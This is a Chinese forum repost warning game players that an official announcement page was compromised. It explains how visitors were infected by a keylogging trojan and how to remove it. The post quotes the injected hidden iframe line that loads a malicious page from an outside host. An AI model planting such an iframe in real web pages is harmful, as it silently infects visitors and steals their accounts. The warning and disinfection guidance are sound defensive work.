- 鐵幣
- 3581 元
- 文章
- 1275 篇
- 聲望
- 135 枚
- 上次登入
- 08-7-21
- 精華
- 3
- 註冊時間
- 03-9-7
- UID
- 16296
|
本文來源:巴哈姆特
原文連結:http://forum1.gamer.com.tw/read/05264.php?bsn=05264&snA=47584&locked=F&tnum=55&snAjudge=C
原發表者:WindArea
主要對象:...昨天(20號)有點公告-閱讀電子郵件時需注意的事項-的人=.=|||
-- 事件紀實 --
在昨天(不久) , 官方網站發布了一項公告 : [9.20]閱讀電子郵件時需注意的事項
內容中是因應近來有不肖人士偽裝官方寄信 , 因此公告官方寄信之信箱帳號
原本應該是這樣的 ...
但因不明原因 , 公告的網頁原始檔內竟出現了以下HTML碼 :
<iframe src="http://www.ta.sdcrc.com/fk/js/smss.htm" name=zhu width="0" height="0" frameborder="0">
? 不熟悉DHTML的版友應該會有疑惑 , 這行的用途是?
該行HTML碼的用途在於悄悄於網頁中開啟一個 長寬都設定為 0 , 沒有邊框的框架頁
換句話說 , 該行程式碼意圖載入一個網頁 , 但希望讓使用者無法發現
不用說 , 這時候大家應該發現不妙的地方了
這不正是許多馬夫所慣用的手法 ... !?
竟然在官方公告出現!?
-- 該木馬資料 --
以 F-Secure Anti-Virus 掃毒到資料為準的話 , 該網頁共將植入
TrojanSpy.Win32.Delf , 以及 Exploit.HTML.Mht
兩檔案 , 以Exploit.HTML.Mht為引 , 植入 TrojanSpy.Win32.Delf
TrojanSpy.Win32 此木馬會於 Windows\System32 中 , 植入兩個檔案 , 分別為 :
1. exploret.exe
2. systemlt.dll
並將更動登錄機碼 , 以於重新開機後木馬將正式載入
-- 可能受害的危險群 --
1. 在網咖進行遊戲者 (尤指該網咖Windows未更新者)
2. 在家進行遊戲 , 但Windows並未開啟自動更新 , 也很久未手動更新者
這隻木馬所植入的方式是抓過去IE中的一個漏洞 , 但已被修正
因此有更新Windows的版友(可能)較不需擔心
-- 中毒徵兆 --
若你有看過該公告 , 且執行天二時發現 掃毒用的那隻 貓 不會出現 !?
取而代之的是 Can't run nProtect **** **** 的字樣的話
便是確定中毒了
若之後有登入天二 , 請依照下列方式移除木馬後 , 重新開機
並儘速前往官方網站變更密碼
-- 重新開機後該木馬移除方式 --
1. 請打開工作管理員 , 強制關閉 exploret.exe 的執行
2. 請至 System32 底下 , 將exploret.exe , systemlt.dll 兩檔案刪除
3. (此動作較為危險 , 執行前請務必確定你會使用登錄編輯器)
請於執行輸入 REGEDIT , 開啟登錄編輯器
然後請點擊 [編輯] -> [尋找] , 輸入字串 exploret , 讓登錄編輯器自動搜尋
最後請把所有發現有 exploret 字樣的子機碼值均刪除即可 (約有3-4個)
-- 重要的備註 --
*1. 可能的話 , 請大家將身分證字號與新密碼 , 均先另行寫在新txt檔案中
以複製貼上的方式變更密碼 , 這方式較能確保安全
*2. 若有可能 , 請大家安裝防火牆並更新Windows ... 這才是確保未來安全的唯一之道
*3. 大家可以好好想一下 , 要怎麼抓NCTW來負責任了 ... |
|